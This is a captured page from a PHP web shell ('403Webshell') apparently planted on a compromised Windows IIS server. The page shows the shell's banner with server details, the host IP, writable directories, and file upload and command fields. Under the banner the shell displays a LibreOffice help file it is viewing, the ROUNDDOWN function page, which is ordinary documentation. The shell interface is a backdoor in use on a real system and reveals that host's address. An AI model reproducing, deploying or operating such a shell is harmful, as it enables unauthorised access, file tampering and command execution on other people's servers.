403Webshell
Server IP : 121.121.20.254  /  Your IP : 216.73.217.141
Web Server : Microsoft-IIS/10.0
System : Windows NT WEB-SERVER 10.0 build 20348 (Windows Server 2022) AMD64
User : IUSR ( 0)
PHP Version : 8.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Program Files/LibreOffice/help/en-US/text/scalc/01/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/Program Files/LibreOffice/help/en-US/text/scalc/01/func_rounddown.html
<!DOCTYPE html>
<html lang="en-US" dir="ltr">
<head>
<base href="../../../../">
<noscript><meta http-equiv="refresh" content="0; URL=../../../../en-US/noscript.html"></noscript>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>ROUNDDOWN function</title>
<link rel="shortcut icon" href="media/navigation/favicon.ico">
<link type="text/css" href="normalize.css" rel="Stylesheet">
<link type="text/css" href="prism.css" rel="Stylesheet">
<link type="text/css" href="default.css" rel="Stylesheet">
<script type="text/javascript" src="polyfills.js"></script><script type="text/javascript" src="languages.js"></script><script type="text/javascript" src="en-US/langnames.js"></script><script type="text/javascript" src="flexsearch.debug.js"></script><script type="text/javascript" src="prism.js"></script><script type="text/javascript" src="help2.js" defer></script><script type="text/javascript" src="a11y-toggle.js" defer></script><script type="text/javascript" src="paginathing.js" defer></script><script type="text/javascript" src="en-US/bookmarks.js" defer></script><script type="text/javascript" src="en-US/contents.js" defer></script><script type="text/javascript" src="help.js" defer></script><meta name="viewport" content="width=device-width,initial-scale=1">
</head>
<body>
<header id="TopLeftHeader"><a class="symbol" href="en-US/text/shared/05/new_help.html"><div></div></a><a class="logo" href="en-US/text/shared/05/new_help.html"><p dir="auto">LibreOffice 24.2 Help</p></a><div class="dropdowns"><div class="modules">
<button type="button" data-a11y-toggle="modules-nav" id="modules" aria-haspopup="true" aria-expanded="false" aria-controls="modules-nav">Module</button><nav id="modules-nav" hidden=""></nav>
</div></div></header><aside class="leftside"><input id="accordion-1" name="accordion-menu" type="checkbox"><label for="accordion-1" dir="auto">Contents</label><div id="Contents" class="contents-treeview"></div></aside><div id="SearchFrame"><div id="Bookmarks">
<input id="search-bar" type="search" class="search" placeholder="Search in bookmarks for chosen module" dir="auto"><div class="nav-container" tabindex="0"><nav class="index" dir="auto"></nav></div>
</div></div>
<div id="DisplayArea" itemprop="softwareHelp" itemscope="true" itemtype="http://schema.org/SoftwareApplication">
  <a name="bm_id3156384"></a>
    <meta itemprop="keywords" content="ROUNDDOWN function">
    <meta itemprop="keywords" content="numbers,rounding down">
  
  <a name="bm_id3146003"></a>
  <h1 id="hd_id601641846107898" dir="auto">
<a name="rounddown_h1"></a>ROUNDDOWN function</h1>
  <a name="rounddown_desc"></a>
    <p id="par_id841641927277474" class="paragraph" dir="auto">Rounds down a number while keeping a specified number of decimal digits.</p>
  
  <p id="par_id701642530512560" class="paragraph" dir="auto">This function is equivalent to the <a target="_top" href="en-US/text/scalc/01/func_trunc.html">TRUNC function</a>.</p>
  <div class="embedded">
<a name="trunc_tip"></a>
    <div class="tip">
<div class="noteicon" dir="auto"><img src="media/icon-themes/res/helpimg/tip.svg" alt="tip" style="width:40px;height:40px;"></div>
<div class="notetext"><p id="par_id321641927458888" dir="auto">The rounding method used by this function is known as <span class="emph">rounding towards zero</span>. The magnitude of the resulting number will always be less than or equal to the original number.</p></div>
</div>
<br>
  </div>
  <div class="embedded">
<a name="func_head_syntax"></a>
    <h3 id="hd_id126511265112651" dir="auto">Syntax</h3>
  </div>
  <p id="par_id341641927560587" class="paragraph" dir="auto">
    <span class="input" data-tooltip="Click on text to copy to clipboard">ROUNDDOWN(Number [; Count])</span>
  </p>
  <a name="rounddown_parameters"></a>
    <p id="par_id11641927688319" class="paragraph" dir="auto"><span class="emph">Number:</span> The number to be rounded down.</p>
    <p id="par_id861641927715672" class="paragraph" dir="auto"><span class="emph">Count:</span> Optional parameter that defines the number of decimal places to be kept. The default value is 0 (zero).</p>
    <p id="par_id911641928545976" class="paragraph" dir="auto">Use negative values for <span class="emph">Count</span> to round the integer part of the original <span class="emph">Number</span>. For example, -1 will round down the first integer number before the decimal separator, -2 will round down the two integer numbers before the decimal separator, and so forth.</p>
  
  <div class="note">
<div class="noteicon" dir="auto"><img src="media/icon-themes/res/helpimg/note.svg" alt="note" style="width:40px;height:40px;"></div>
<div class="notetext"><p id="par_id181641929609906" dir="auto">In LibreOffice, the <span class="emph">Count</span> parameter is optional, whereas in Microsoft Excel this parameter is mandatory. When an ODS file contains a call to ROUNDDOWN without the <span class="emph">Count</span> parameter and the file is exported to XLS or XLSX formats, the missing argument will automatically be added with value zero to maintain compatibility.</p></div>
</div>
<br>
  <div class="embedded">
<a name="func_head_example"></a>
    <h3 id="hd_id980889808898088" dir="auto">Examples</h3>
  </div>
  <p id="par_id901641928192870" class="paragraph" dir="auto"><span class="input" data-tooltip="Click on text to copy to clipboard">=ROUNDDOWN(21.89)</span> returns 21. Note that this example uses the default value for <span class="emph">Count</span> which is 0.</p>
  <p id="par_id901641928192110" class="paragraph" dir="auto"><span class="input" data-tooltip="Click on text to copy to clipboard">=ROUNDDOWN(103.37,1)</span> returns 103.3.</p>
  <p id="par_id171641928456743" class="paragraph" dir="auto"><span class="input" data-tooltip="Click on text to copy to clipboard">=ROUNDDOWN(0.664,2)</span> returns 0.66.</p>
  <p id="par_id641641928712287" class="paragraph" dir="auto"><span class="input" data-tooltip="Click on text to copy to clipboard">=ROUNDDOWN(214.2,-1)</span> returns 210. Note the negative value for <span class="emph">Count</span>, which causes the first integer value before the decimal separator to be rounded towards zero.</p>

  <a name="relatedtopics"></a><div class="relatedtopics">
<p class="related" itemprop="mentions" dir="auto"><a name="related"></a><span class="emph">Related Topics</span>
</p>
<div class="relatedbody" itemprop="mentions">
    <div class="tip">
<div class="noteicon" dir="auto"><img src="media/icon-themes/res/helpimg/tip.svg" alt="tip" style="width:40px;height:40px;"></div>
<div class="notetext"><p id="par_id161677014850199" dir="auto"><a target="_blank" href="https://wiki.documentfoundation.org/Documentation/Calc_Functions/ROUNDDOWN">ROUNDDOWN wiki page</a>.</p></div>
</div>
<br>
    <div class="embedded"><p class="embedded" dir="auto"><a target="_top" href="en-US/text/scalc/01/func_trunc.html">TRUNC function</a></p></div>
    <div class="embedded"><p class="embedded" dir="auto"><a target="_top" href="en-US/text/scalc/01/04060106.html">Mathematical Functions</a></p></div>
  </div>
</div>
</div>
<div id="DonationFrame"></div>
<footer><div id="DEBUG" class="debug">
<h3 class="bug">Help content debug info:</h3>
<p dir="auto">This page is: <a href="https://opengrok.libreoffice.org/xref/help/source/text/scalc/01/func_rounddown.xhp" target="_blank">/text/scalc/01/func_rounddown.xhp</a></p>
<p dir="auto">Title is: ROUNDDOWN function</p>
<p id="bm_module" dir="auto"></p>
<p id="bm_system" dir="auto"></p>
<p id="bm_HID" dir="auto"></p>
</div></footer>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit